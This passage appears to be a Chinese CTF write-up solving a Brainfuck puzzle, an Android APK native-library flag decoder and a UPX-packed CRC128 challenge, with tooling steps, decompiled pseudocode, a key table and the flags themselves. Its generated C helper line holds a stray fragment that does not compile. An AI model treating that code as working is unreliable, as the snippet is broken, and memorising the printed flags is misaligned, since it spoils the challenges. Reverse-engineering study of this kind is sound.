inc=0,dec=0,tab=0,line=0;
sl(tab);printf("#include <cstdio>\n");
sl(tab);printf("int mem[1000000], pt=0; void out(int a) { printf(\"%%c\", a); }int in() { return getchar(); }return ch; }\n");
sl(tab);printf("int main(){");el();
tab++;
while(scanf("%s",str)!=EOF)
{
int len=strlen(str);
for (int i=0;i<len;i++)
{
//printf("%c\n",str[i]);
switch(str[i])
{
case '>':
inc++;
if (str[i]!=str[i+1]){sl(tab);printf("pt+=%d;",inc);el();inc=0;}
break;
case '<':
dec++;
if (str[i]!=str[i+1]){sl(tab);printf("pt-=%d;",dec);el();dec=0;}
break;
case '+':
inc++;
if (str[i]!=str[i+1]){sl(tab);printf("mem[pt]+=%d;",inc);el();inc=0;}
break;
case '-':
dec++;
if (str[i]!=str[i+1]){sl(tab);printf("mem[pt]-=%d;",dec);el();dec=0;}
break;
case '.':
sl(tab);printf("out(mem[pt]);");el();
break;
case ',':
sl(tab);printf("mem[pt]=in();");el();
break;
case '[':
tab++;
sl(tab-1);printf("while(mem[pt]){");el();
break;
case ']':
tab--;
sl(tab);printf("}");el();
break;
case '#':
sl(tab);printf("return 0;");el();
break;
case '\n':
break;
}
}
}
sl(tab-1);printf("}");//el();
}
/*(
>
指针加一
<
指针减一
+
指针指向的字节的值加一
-
指针指向的字节的值减一
.
输出指针指向的单元内容(ASCII码)
,
输入内容到指针指向的单元(ASCII码)
[
如果指针指向的单元值为零,向后跳转到对应的]指令的次一指令处
]
如果指针指向的单元值不为零,向前跳转到对应的[指令的次一指令处
#
强制退出程序( 为了简化程序而额外增加的一个状态 )
*/
将如下bf程序存储到code.bf,执行转换程序
<[<]>[.>]
>++++++++++[<++++++++++>-]<+++++++[<->-]<[#]>++++++++++[<++++++++++>-]<-[<->-]<[#]>++++++++++[<++++++++++>-]<++[<->-]<[#]>+++++++++++[<++++++++++>-]<[<->-]<[#]
>+++[<++++++++++>-]<+++[<->-]<[#]>++++++++++[<++++++++++>-]<---[<->-]<[#]>+++++++++++[<++++++++++>-]<++++[<->-]<[#]>++++++++++[<++++++++++>-]<--[<->-]<[#]
<[>>+<<-]>>[<+<+>>-]>++++++[<++++++++++>-]<---[<->-]<[#]
>++++++[<++++++++>-]<[<-<->>-]<<[>++++++++++<-]>>>++++[<++++++++++>-]<-[<->-]<[#]
生成的code.cpp伪代码如下
#include <cstdio>
int mem[1000000], pt=0; void out(int a) { printf("%c", a); }int in() { return getchar(); }return ch; }
int main(){
pt-=1;
while(mem[pt]){
pt-=1;
}
pt+=1;
while(mem[pt]){
out(mem[pt]);
pt+=1;
}
pt+=1;
mem[pt]+=10;
while(mem[pt]){
pt-=1;
mem[pt]+=10;
pt+=1;
mem[pt]-=1;
}
pt-=1;
mem[pt]+=7;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
return 0;
}
pt+=1;
mem[pt]+=10;
while(mem[pt]){
pt-=1;
mem[pt]+=10;
pt+=1;
mem[pt]-=1;
}
pt-=1;
mem[pt]-=1;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
return 0;
}
pt+=1;
mem[pt]+=10;
while(mem[pt]){
pt-=1;
mem[pt]+=10;
pt+=1;
mem[pt]-=1;
}
pt-=1;
mem[pt]+=2;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
return 0;
}
pt+=1;
mem[pt]+=11;
while(mem[pt]){
pt-=1;
mem[pt]+=10;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
return 0;
}
pt+=1;
mem[pt]+=3;
while(mem[pt]){
pt-=1;
mem[pt]+=10;
pt+=1;
mem[pt]-=1;
}
pt-=1;
mem[pt]+=3;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
return 0;
}
pt+=1;
mem[pt]+=10;
while(mem[pt]){
pt-=1;
mem[pt]+=10;
pt+=1;
mem[pt]-=1;
}
pt-=1;
mem[pt]-=3;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
return 0;
}
pt+=1;
mem[pt]+=11;
while(mem[pt]){
pt-=1;
mem[pt]+=10;
pt+=1;
mem[pt]-=1;
}
pt-=1;
mem[pt]+=4;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
return 0;
}
pt+=1;
mem[pt]+=10;
while(mem[pt]){
pt-=1;
mem[pt]+=10;
pt+=1;
mem[pt]-=1;
}
pt-=1;
mem[pt]-=2;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
return 0;
}
pt-=1;
while(mem[pt]){
pt+=2;
mem[pt]+=1;
pt-=2;
mem[pt]-=1;
}
pt+=2;
while(mem[pt]){
pt-=1;
mem[pt]+=1;
pt-=1;
mem[pt]+=1;
pt+=2;
mem[pt]-=1;
}
pt+=1;
mem[pt]+=6;
while(mem[pt]){
pt-=1;
mem[pt]+=10;
pt+=1;
mem[pt]-=1;
}
pt-=1;
mem[pt]-=3;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
return 0;
}
pt+=1;
mem[pt]+=6;
while(mem[pt]){
pt-=1;
mem[pt]+=8;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt-=1;
mem[pt]-=1;
pt+=2;
mem[pt]-=1;
}
pt-=2;
while(mem[pt]){
pt+=1;
mem[pt]+=10;
pt-=1;
mem[pt]-=1;
}
pt+=3;
mem[pt]+=4;
while(mem[pt]){
pt-=1;
mem[pt]+=10;
pt+=1;
mem[pt]-=1;
}
pt-=1;
mem[pt]-=1;
while(mem[pt]){
pt-=1;
mem[pt]-=1;
pt+=1;
mem[pt]-=1;
}
pt-=1;
while(mem[pt]){
return 0;
}
}
然后代码逻辑很直观,手玩就知道Flag了
//cnss{39bra!nfck}
Language_Problem
用Jadx查看Java源代码
this.textView.setText(MyJni.getFlag());
public class MyJni {
public static native String getFlag();
static {
System.loadLibrary("MyJni");
}
}
发现输出Flag的时候调用了类MyJni中的函数getFlag,而且这个类MyJni是从动态库libMyJni.so加载的,这里可以用Apktool来解包提取动态库
apktool.bat xi4sht.apk
把提取出来的动态库libMyJni.so放到IDA里生成下面的伪代码,再把伪代码改一改编译一下就能跑出Flag了
int Decode_Flag() { char *v0; // edi size_t v1; // edx _BYTE *v2; // esi unsigned int v3; // eax signed int v4; // ecx char *v5; // edi _WORD *v6; // esi char *v7; // edi int v8; // ecx int v9; // ebp unsigned __int8 v10; // ST10_1 int result; // eax __int16 v12; // cx char v13; // [esp+29h] [ebp-133h] char v14; // [esp+2Ah] [ebp-132h] int v15; // [esp+2Ch] [ebp-130h] int v16; // [esp+13Ch] [ebp-20h] v0 = &v14; v1 = strlen(flag); v2 = &key[1]; v13 = key[0]; v3 = 254; if ( (unsigned int)&v14 & 2 ) { v12 = *(_WORD *)v2; v0 = (char *)&v15; v3 = 252; v2 = &key[3]; *(_WORD *)&v14 = v12; } qmemcpy(v0, v2, 4 * (v3 >> 2)); v6 = &v2[4 * (v3 >> 2)]; v5 = &v0[4 * (v3 >> 2)]; v4 = 0; if ( v3 & 2 ) { *(_WORD *)v5 = *v6; v4 = 1; } if ( v3 & 1 ) v5[v4 * 2] = v6[v4]; if ( v1 ) { v7 = flag; v8 = 0; v9 = 0; do { ++v7; v9 += -255 * ((v9 + 1) / 255) + 1; v10 = *(&v13 + v9); v8 = (v10 + v8) % 255; *(&v13 + v9) = *(&v13 + v8); *(&v13 + v8) = v10; *(v7 - 1) ^= *(&v13 + (v10 + (unsigned int)(unsigned __int8)*(&v13 + v9)) % 0xFF); } while ( v7 != &flag[v1] ); } result = _stack_chk_guard; if ( v16 != _stack_chk_guard ) sub_430(); return result; } int __cdecl Java_com_example_languageproblem_MyJni_getFlag(int a1) { Decode_Flag(); return (*(int (__cdecl **)(int, char *))(*(_DWORD *)a1 + 668))(a1, flag); } //cnss{Y0u_Ar3_an_Apk_cr4ck3r}
[Boss] Algebra Game
先脱Upx壳,再F5查看伪代码
发现有垃圾代码导致不能生成伪代码,可以用字节替换过掉,再把花指令修复下就可以看出逻辑了
再次F5查看伪代码,发现程序的核心是个不认识的多轮加密,询问yype后得知这是CRC128
这时问题就转化为了求Content满足下式
CRC128(cnss{Content})==Content
而CRC128有个特性,就是它的加密是线性的
原文的某一位Flip会影响到最终Hash的特定若干位的Flip
这个影响在原文长度固定的时候是固定的
所以只要统计出每一位Flip对最后结果的影响,再用高斯消元解异或方程组即可解得Flag
unsigned char key[256 * 16] = { 0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0
,0x97,0x1,0x0A1,0x0ED,0x0C6,0x0E6,0x0B2,0x0F,0x86,0x66,0x5B,0x0AC,0x76,0x0A6,0x17,0x0E2
,0x0DD,0x0AA,0x0B9,0x22,0x13,0x46,0x0CF,0x0D2,0x4E,0x0D1,0x57,0x42,0x0D4,0x0D3,0x4,0x0AF
,0x4A,0x0AB,0x18,0x0CF,0x0D5,0x0A0,0x7D,0x0DD,0x0C8,0x0B7,0x0C,0x0EE,0x0A2,0x75,0x13,0x4D
,0x49,0x0FC,0x88,0x0BC,0x0B8,0x7,0x34,0x68,0x0DF,0x0BE,0x4E,0x9E,0x91,0x38,0x22,0x35
,0x0DE,0x0FD,0x29,0x51,0x7E,0x0E1,0x86,0x67,0x59,0x0D8,0x15,0x32,0x0E7,0x9E,0x35,0x0D7
,0x94,0x56,0x31,0x9E,0x0AB,0x41,0x0FB,0x0BA,0x91,0x6F,0x19,0x0DC,0x45,0x0EB,0x26,0x9A
,0x3,0x57,0x90,0x73,0x6D,0x0A7,0x49,0x0B5,0x17,0x9,0x42,0x70,0x33,0x4D,0x31,0x78
,0x92,0x0F8,0x11,0x79,0x71,0x0F,0x68,0x0D0,0x0BE,0x7D,0x9D,0x3C,0x23,0x71,0x44,0x6A
,0x5,0x0F9,0x0B0,0x94,0x0B7,0x0E9,0x0DA,0x0DF,0x38,0x1B,0x0C6,0x90,0x55,0x0D7,0x53,0x88
,0x4F,0x52,0x0A8,0x5B,0x62,0x49,0x0A7,0x2,0x0F0,0x0AC,0x0CA,0x7E,0x0F7,0x0A2,0x40,0x0C5
,0x0D8,0x53,0x9,0x0B6,0x0A4,0x0AF,0x15,0x0D,0x76,0x0CA,0x91,0x0D2,0x81,0x4,0x57,0x27
,0x0DB,0x4,0x99,0x0C5,0x0C9,0x8,0x5C,0x0B8,0x61,0x0C3,0x0D3,0x0A2,0x0B2,0x49,0x66,0x5F
,0x4C,0x5,0x38,0x28,0x0F,0x0EE,0x0EE,0x0B7,0x0E7,0x0A5,0x88,0x0E,0x0C4,0x0EF,0x71,0x0BD
,0x6,0x0AE,0x20,0x0E7,0x0DA,0x4E,0x93,0x6A,0x2F,0x12,0x84,0x0E0,0x66,0x9A,0x62,0x0F0
,0x91,0x0AF,0x81,0x0A,0x1C,0x0A8,0x21,0x65,0x0A9,0x74,0x0DF,0x4C,0x10,0x3C,0x75,0x12
,0x24,0x0F1,0x23,0x0F2,0x0E2,0x1E,0x0D0,0x0A0,0x7D,0x0FB,0x3A,0x79,0x46,0x0E2,0x88,0x0D4
,0x0B3,0x0F0,0x82,0x1F,0x24,0x0F8,0x62,0x0AF,0x0FB,0x9D,0x61,0x0D5,0x30,0x44,0x9F,0x36
,0x0F9,0x5B,0x9A,0x0D0,0x0F1,0x58,0x1F,0x72,0x33,0x2A,0x6D,0x3B,0x92,0x31,0x8C,0x7B
,0x6E,0x5A,0x3B,0x3D,0x37,0x0BE,0x0AD,0x7D,0x0B5,0x4C,0x36,0x97,0x0E4,0x97,0x9B,0x99
,0x6D,0x0D,0x0AB,0x4E,0x5A,0x19,0x0E4,0x0C8,0x0A2,0x45,0x74,0x0E7,0x0D7,0x0DA,0x0AA,0x0E1
,0x0FA,0x0C,0x0A,0x0A3,0x9C,0x0FF,0x56,0x0C7,0x24,0x23,0x2F,0x4B,0x0A1,0x7C,0x0BD,0x3
,0x0B0,0x0A7,0x12,0x6C,0x49,0x5F,0x2B,0x1A,0x0EC,0x94,0x23,0x0A5,0x3,0x9,0x0AE,0x4E
,0x27,0x0A6,0x0B3,0x81,0x8F,0x0B9,0x99,0x15,0x6A,0x0F2,0x78,0x9,0x75,0x0AF,0x0B9,0x0AC
,0x0B6,0x9,0x32,0x8B,0x93,0x11,0x0B8,0x70,0x0C3,0x86,0x0A7,0x45,0x65,0x93,0x0CC,0x0BE
,0x21,0x8,0x93,0x66,0x55,0x0F7,0x0A,0x7F,0x45,0x0E0,0x0FC,0x0E9,0x13,0x35,0x0DB,0x5C
,0x6B,0x0A3,0x8B,0x0A9,0x80,0x57,0x77,0x0A2,0x8D,0x57,0x0F0,0x7,0x0B1,0x40,0x0C8,0x11
,0x0FC,0x0A2,0x2A,0x44,0x46,0x0B1,0x0C5,0x0AD,0x0B,0x31,0x0AB,0x0AB,0x0C7,0x0E6,0x0DF,0x0F3
,0x0FF,0x0F5,0x0BA,0x37,0x2B,0x16,0x8C,0x18,0x1C,0x38,0x0E9,0x0DB,0x0F4,0x0AB,0x0EE,0x8B
,0x68,0x0F4,0x1B,0x0DA,0x0ED,0x0F0,0x3E,0x17,0x9A,0x5E,0x0B2,0x77,0x82,0x0D,0x0F9,0x69
,0x22,0x5F,0x3,0x15,0x38,0x50,0x43,0x0CA,0x52,0x0E9,0x0BE,0x99,0x20,0x78,0x0EA,0x24
,0x0B5,0x5E,0x0A2,0x0F8,0x0FE,0x0B6,0x0F1,0x0C5,0x0D4,0x8F,0x0E5,0x35,0x56,0x0DE,0x0FD,0x0C6
,0x0BB,0x4B,0x0BC,0x1D,0x5B,0x0B6,0x0A,0x8C,0x0B9,0x0EA,0x94,0x0E8,0x0B5,0x5B,0x3A,0x0C2
,0x2C,0x4A,0x1D,0x0F0,0x9D,0x50,0x0B8,0x83,0x3F,0x8C,0x0CF,0x44,0x0C3,0x0FD,0x2D,0x20
,0x66,0x0E1,0x5,0x3F,0x48,0x0F0,0x0C5,0x5E,0x0F7,0x3B,0x0C3,0x0AA,0x61,0x88,0x3E,0x6D
,0x0F1,0x0E0,0x0A4,0x0D2,0x8E,0x16,0x77,0x51,0x71,0x5D,0x98,0x6,0x17,0x2E,0x29,0x8F
,0x0F2,0x0B7,0x34,0x0A1,0x0E3,0x0B1,0x3E,0x0E4,0x66,0x54,0x0DA,0x76,0x24,0x63,0x18,0x0F7
,0x65,0x0B6,0x95,0x4C,0x25,0x57,0x8C,0x0EB,0x0E0,0x32,0x81,0x0DA,0x52,0x0C5,0x0F,0x15
,0x2F,0x1D,0x8D,0x83,0x0F0,0x0F7,0x0F1,0x36,0x28,0x85,0x8D,0x34,0x0F0,0x0B0,0x1C,0x58
,0x0B8,0x1C,0x2C,0x6E,0x36,0x11,0x43,0x39,0x0AE,0x0E3,0x0D6,0x98,0x86,0x16,0x0B,0x0BA
,0x29,0x0B3,0x0AD,0x64,0x2A,0x0B9,0x62,0x5C,0x7,0x97,0x9,0x0D4,0x96,0x2A,0x7E,0x0A8
,0x0BE,0x0B2,0x0C,0x89,0x0EC,0x5F,0x0D0,0x53,0x81,0x0F1,0x52,0x78,0x0E0,0x8C,0x69,0x4A
,0x0F4,0x19,0x14,0x46,0x39,0x0FF,0x0AD,0x8E,0x49,0x46,0x5E,0x96,0x42,0x0F9,0x7A,0x7
,0x63,0x18,0x0B5,0x0AB,0x0FF,0x19,0x1F,0x81,0x0CF,0x20,0x5,0x3A,0x34,0x5F,0x6D,0x0E5
,0x60,0x4F,0x25,0x0D8,0x92,0x0BE,0x56,0x34,0x0D8,0x29,0x47,0x4A,0x7,0x12,0x5C,0x9D
,0x0F7,0x4E,0x84,0x35,0x54,0x58,0x0E4,0x3B,0x5E,0x4F,0x1C,0x0E6,0x71,0x0B4,0x4B,0x7F
,0x0BD,0x0E5,0x9C,0x0FA,0x81,0x0F8,0x99,0x0E6,0x96,0x0F8,0x10,0x8,0x0D3,0x0C1,0x58,0x32
,0x2A,0x0E4,0x3D,0x17,0x47,0x1E,0x2B,0x0E9,0x10,0x9E,0x4B,0x0A4,0x0A5,0x67,0x4F,0x0D0
,0x9F,0x0BA,0x9F,0x0EF,0x0B9,0x0A8,0x0DA,0x2C,0x0C4,0x11,0x0AE,0x91,0x0F3,0x0B9,0x0B2,0x16
,0x8,0x0BB,0x3E,0x2,0x7F,0x4E,0x68,0x23,0x42,0x77,0x0F5,0x3D,0x85,0x1F,0x0A5,0x0F4
,0x42,0x10,0x26,0x0CD,0x0AA,0x0EE,0x15,0x0FE,0x8A,0x0C0,0x0F9,0x0D3,0x27,0x6A,0x0B6,0x0B9
,0x0D5,0x11,0x87,0x20,0x6C,0x8,0x0A7,0x0F1,0x0C,0x0A6,0x0A2,0x7F,0x51,0x0CC,0x0A1,0x5B
,0x0D6,0x46,0x17,0x53,0x1,0x0AF,0x0EE,0x44,0x1B,0x0AF,0x0E0,0x0F,0x62,0x81,0x90,0x23
,0x41,0x47,0x0B6,0x0BE,0x0C7,0x49,0x5C,0x4B,0x9D,0x0C9,0x0BB,0x0A3,0x14,0x27,0x87,0x0C1
,0x0B,0x0EC,0x0AE,0x71,0x12,0x0E9,0x21,0x96,0x55,0x7E,0x0B7,0x4D,0x0B6,0x52,0x94,0x8C
,0x9C,0x0ED,0x0F,0x9C,0x0D4,0x0F,0x93,0x99,0x0D3,0x18,0x0EC,0x0E1,0x0C0,0x0F4,0x83,0x6E
,0x0D,0x42,0x8E,0x96,0x0C8,0x0A7,0x0B2,0x0FC,0x7A,0x6C,0x33,0x0AD,0x0D0,0x0C8,0x0F6,0x7C
,0x9A,0x43,0x2F,0x7B,0x0E,0x41,0x0,0x0F3,0x0FC,0x0A,0x68,0x1,0x0A6,0x6E,0x0E1,0x9E
,0x0D0,0x0E8,0x37,0x0B4,0x0DB,0x0E1,0x7D,0x2E,0x34,0x0BD,0x64,0x0EF,0x4,0x1B,0x0F2,0x0D3
,0x47,0x0E9,0x96,0x59,0x1D,0x7,0x0CF,0x21,0x0B2,0x0DB,0x3F,0x43,0x72,0x0BD,0x0E5,0x31
,0x44,0x0BE,0x6,0x2A,0x70,0x0A0,0x86,0x94,0x0A5,0x0D2,0x7D,0x33,0x41,0x0F0,0x0D4,0x49
,0x0D3,0x0BF,0x0A7,0x0C7,0x0B6,0x46,0x34,0x9B,0x23,0x0B4,0x26,0x9F,0x37,0x56,0x0C3,0x0AB
,0x99,0x14,0x0BF,0x8,0x63,0x0E6,0x49,0x46,0x0EB,0x3,0x2A,0x71,0x95,0x23,0x0D0,0x0E6
,0x0E,0x15,0x1E,0x0E5,0x0A5,0x0,0x0FB,0x49,0x6D,0x65,0x71,0x0DD,0x0E3,0x85,0x0C7,0x4
,0x85,0x3E,0x83,0x0C2,0x28,0x0E7,0x0BF,0x0D5,0x31,0x0C9,0x0C8,0x0CB,0x52,0x28,0x5F,0x0EF
,0x12,0x3F,0x22,0x2F,0x0EE,0x1,0x0D,0x0DA,0x0B7,0x0AF,0x93,0x67,0x24,0x8E,0x48,0x0D
,0x58,0x94,0x3A,0x0E0,0x3B,0x0A1,0x70,0x7,0x7F,0x18,0x9F,0x89,0x86,0x0FB,0x5B,0x40
,0x0CF,0x95,0x9B,0x0D,0x0FD,0x47,0x0C2,0x8,0x0F9,0x7E,0x0C4,0x25,0x0F0,0x5D,0x4C,0x0A2
,0x0CC,0x0C2,0x0B,0x7E,0x90,0x0E0,0x8B,0x0BD,0x0EE,0x77,0x86,0x55,0x0C3,0x10,0x7D,0x0DA
,0x5B,0x0C3,0x0AA,0x93,0x56,0x6,0x39,0x0B2,0x68,0x11,0x0DD,0x0F9,0x0B5,0x0B6,0x6A,0x38
,0x11,0x68,0x0B2,0x5C,0x83,0x0A6,0x44,0x6F,0x0A0,0x0A6,0x0D1,0x17,0x17,0x0C3,0x79,0x75
,0x86,0x69,0x13,0x0B1,0x45,0x40,0x0F6,0x60,0x26,0x0C0,0x8A,0x0BB,0x61,0x65,0x6E,0x97
,0x17,0x0C6,0x92,0x0BB,0x59,0x0E8,0x0D7,0x5,0x8F,0x0B4,0x55,0x0F7,0x71,0x59,0x1B,0x85
,0x80,0x0C7,0x33,0x56,0x9F,0x0E,0x65,0x0A,0x9,0x0D2,0x0E,0x5B,0x7,0x0FF,0x0C,0x67
,0x0CA,0x6C,0x2B,0x99,0x4A,0x0AE,0x18,0x0D7,0x0C1,0x65,0x2,0x0B5,0x0A5,0x8A,0x1F,0x2A
,0x5D,0x6D,0x8A,0x74,0x8C,0x48,0x0AA,0x0D8,0x47,0x3,0x59,0x19,0x0D3,0x2C,0x8,0x0C8
,0x5E,0x3A,0x1A,0x7,0x0E1,0x0EF,0x0E3,0x6D,0x50,0x0A,0x1B,0x69,0x0E0,0x61,0x39,0x0B0
,0x0C9,0x3B,0x0BB,0x0EA,0x27,0x9,0x51,0x62,0x0D6,0x6C,0x40,0x0C5,0x96,0x0C7,0x2E,0x52
,0x83,0x90,0x0A3,0x25,0x0F2,0x0A9,0x2C,0x0BF,0x1E,0x0DB,0x4C,0x2B,0x34,0x0B2,0x3D,0x1F
,0x14,0x91,0x2,0x0C8,0x34,0x4F,0x9E,0x0B0,0x98,0x0BD,0x17,0x87,0x42,0x14,0x2A,0x0FD
,0x0A1,0x0CF,0x0A0,0x30,0x0CA,0x0F9,0x6F,0x75,0x4C,0x32,0x0F2,0x0B2,0x14,0x0CA,0x0D7,0x3B
,0x36,0x0CE,0x1,0x0DD,0x0C,0x1F,0x0DD,0x7A,0x0CA,0x54,0x0A9,0x1E,0x62,0x6C,0x0C0,0x0D9
,0x7C,0x65,0x19,0x12,0x0D9,0x0BF,0x0A0,0x0A7,0x2,0x0E3,0x0A5,0x0F0,0x0C0,0x19,0x0D3,0x94
,0x0EB,0x64,0x0B8,0x0FF,0x1F,0x59,0x12,0x0A8,0x84,0x85,0x0FE,0x5C,0x0B6,0x0BF,0x0C4,0x76
,0x0E8,0x33,0x28,0x8C,0x72,0x0FE,0x5B,0x1D,0x93,0x8C,0x0BC,0x2C,0x85,0x0F2,0x0F5,0x0E
,0x7F,0x32,0x89,0x61,0x0B4,0x18,0x0E9,0x12,0x15,0x0EA,0x0E7,0x80,0x0F3,0x54,0x0E2,0x0EC
,0x35,0x99,0x91,0x0AE,0x61,0x0B8,0x94,0x0CF,0x0DD,0x5D,0x0EB,0x6E,0x51,0x21,0x0F1,0x0A1
,0x0A2,0x98,0x30,0x43,0x0A7,0x5E,0x26,0x0C0,0x5B,0x3B,0x0B0,0x0C2,0x27,0x87,0x0E6,0x43
,0x33,0x37,0x0B1,0x49,0x0BB,0x0F6,0x7,0x0A5,0x0F2,0x4F,0x6F,0x8E,0x37,0x0BB,0x93,0x51
,0x0A4,0x36,0x10,0x0A4,0x7D,0x10,0x0B5,0x0AA,0x74,0x29,0x34,0x22,0x41,0x1D,0x84,0x0B3
,0x0EE,0x9D,0x8,0x6B,0x0A8,0x0B0,0x0C8,0x77,0x0BC,0x9E,0x38,0x0CC,0x0E3,0x68,0x97,0x0FE
,0x79,0x9C,0x0A9,0x86,0x6E,0x56,0x7A,0x78,0x3A,0x0F8,0x63,0x60,0x95,0x0CE,0x80,0x1C
,0x7A,0x0CB,0x39,0x0F5,0x3,0x0F1,0x33,0x0CD,0x2D,0x0F1,0x21,0x10,0x0A6,0x83,0x0B1,0x64
,0x0ED,0x0CA,0x98,0x18,0x0C5,0x17,0x81,0x0C2,0x0AB,0x97,0x7A,0x0BC,0x0D0,0x25,0x0A6,0x86
,0x0A7,0x61,0x80,0x0D7,0x10,0x0B7,0x0FC,0x1F,0x63,0x20,0x76,0x52,0x72,0x50,0x0B5,0x0CB
,0x30,0x60,0x21,0x3A,0x0D6,0x51,0x4E,0x10,0x0E5,0x46,0x2D,0x0FE,0x4,0x0F6,0x0A2,0x29
,0x3E,0x75,0x3F,0x0DF,0x73,0x51,0x0B5,0x59,0x88,0x23,0x5C,0x23,0x0E7,0x73,0x65,0x2D
,0x0A9,0x74,0x9E,0x32,0x0B5,0x0B7,0x7,0x56,0x0E,0x45,0x7,0x8F,0x91,0x0D5,0x72,0x0CF
,0x0E3,0x0DF,0x86,0x0FD,0x60,0x17,0x7A,0x8B,0x0C6,0x0F2,0x0B,0x61,0x33,0x0A0,0x61,0x82
,0x74,0x0DE,0x27,0x10,0x0A6,0x0F1,0x0C8,0x84,0x40,0x94,0x50,0x0CD,0x45,0x6,0x76,0x60
,0x77,0x89,0x0B7,0x63,0x0CB,0x56,0x81,0x31,0x57,0x9D,0x12,0x0BD,0x76,0x4B,0x47,0x18
,0x0E0,0x88,0x16,0x8E,0x0D,0x0B0,0x33,0x3E,0x0D1,0x0FB,0x49,0x11,0x0,0x0ED,0x50,0x0FA
,0x0AA,0x23,0x0E,0x41,0x0D8,0x10,0x4E,0x0E3,0x19,0x4C,0x45,0x0FF,0x0A2,0x98,0x43,0x0B7
,0x3D,0x22,0x0AF,0x0AC,0x1E,0x0F6,0x0FC,0x0EC,0x9F,0x2A,0x1E,0x53,0x0D4,0x3E,0x54,0x55
,0x0AC,0x8D,0x2E,0x0A6,0x2,0x5E,0x0DD,0x89,0x36,0x5E,0x0C1,0x1F,0x0C4,0x2,0x21,0x47
,0x3B,0x8C,0x8F,0x4B,0x0C4,0x0B8,0x6F,0x86,0x0B0,0x38,0x9A,0x0B3,0x0B2,0x0A4,0x36,0x0A5
,0x71,0x27,0x97,0x84,0x11,0x18,0x12,0x5B,0x78,0x8F,0x96,0x5D,0x10,0x0D1,0x25,0x0E8
,0x0E6,0x26,0x36,0x69,0x0D7,0x0FE,0x0A0,0x54,0x0FE,0x0E9,0x0CD,0x0F1,0x66,0x77,0x32,0x0A
,0x0E5,0x71,0x0A6,0x1A,0x0BA,0x59,0x0E9,0x0E1,0x0E9,0x0E0,0x8F,0x81,0x55,0x3A,0x3,0x72
,0x72,0x70,0x7,0x0F7,0x7C,0x0BF,0x5B,0x0EE,0x6F,0x86,0x0D4,0x2D,0x23,0x9C,0x14,0x90
,0x38,0x0DB,0x1F,0x38,0x0A9,0x1F,0x26,0x33,0x0A7,0x31,0x0D8,0x0C3,0x81,0x0E9,0x7,0x0DD
,0x0AF,0x0DA,0x0BE,0x0D5,0x6F,0x0F9,0x94,0x3C,0x21,0x57,0x83,0x6F,0x0F7,0x4F,0x10,0x3F
,0x1A,0x84,0x1C,0x2D,0x91,0x4F,0x65,0x0F9,0x0F5,0x0D8,0x66,0x5A,0x0A1,0x91,0x0ED,0x0F9
,0x8D,0x85,0x0BD,0x0C0,0x57,0x0A9,0x0D7,0x0F6,0x73,0x0BE,0x3D,0x0F6,0x0D7,0x37,0x0FA,0x1B
,0x0C7,0x2E,0x0A5,0x0F,0x82,0x9,0x0AA,0x2B,0x0BB,0x9,0x31,0x18,0x75,0x42,0x0E9,0x56
,0x50,0x2F,0x4,0x0E2,0x44,0x0EF,0x18,0x24,0x3D,0x6F,0x6A,0x0B4,0x3,0x0E4,0x0FE,0x0B4
,0x53,0x78,0x94,0x91,0x29,0x48,0x51,0x91,0x2A,0x66,0x28,0x0C4,0x30,0x0A9,0x0CF,0x0CC
,0x0C4,0x79,0x35,0x7C,0x0EF,0x0AE,0x0E3,0x9E,0x0AC,0x0,0x73,0x68,0x46,0x0F,0x0D8,0x2E
,0x8E,0x0D2,0x2D,0x0B3,0x3A,0x0E,0x9E,0x43,0x64,0x0B7,0x7F,0x86,0x0E4,0x7A,0x0CB,0x63
,0x19,0x0D3,0x8C,0x5E,0x0FC,0x0E8,0x2C,0x4C,0x0E2,0x0D1,0x24,0x2A,0x92,0x0DC,0x0DC,0x81
,0x88,0x7C,0x0D,0x54,0x0E0,0x40,0x0D,0x29,0x4B,0x0A5,0x0FB,0x66,0x82,0x0E0,0x0A9,0x93
,0x1F,0x7D,0x0AC,0x0B9,0x26,0x0A6,0x0BF,0x26,0x0CD,0x0C3,0x0A0,0x0CA,0x0F4,0x46,0x0BE,0x71
,0x55,0x0D6,0x0B4,0x76,0x0F3,0x6,0x0C2,0x0FB,0x5,0x74,0x0AC,0x24,0x56,0x33,0x0AD,0x3C
,0x0C2,0x0D7,0x15,0x9B,0x35,0x0E0,0x70,0x0F4,0x83,0x12,0x0F7,0x88,0x20,0x95,0x0BA,0x0DE
,0x0C1,0x80,0x85,0x0E8,0x58,0x47,0x39,0x41,0x94,0x1B,0x0B5,0x0F8,0x13,0x0D8,0x8B,0x0A6
,0x56,0x81,0x24,0x5,0x9E,0x0A1,0x8B,0x4E,0x12,0x7D,0x0EE,0x54,0x65,0x7E,0x9C,0x44
,0x1C,0x2A,0x3C,0x0CA,0x4B,0x1,0x0F6,0x93,0x0DA,0x0CA,0x0E2,0x0BA,0x0C7,0x0B,0x8F,0x9
,0x8B,0x2B,0x9D,0x27,0x8D,0x0E7,0x44,0x9C,0x5C,0x0AC,0x0B9,0x16,0x0B1,0x0AD,0x98,0x0EB
,0x0F9,0x0D4,0x0FD,0x7C,0x0CF,0x45,0x0D5,0x66,0x21,0x8E,0x70,0x8D,0x9C,0x0CF,0x95,0x0B5
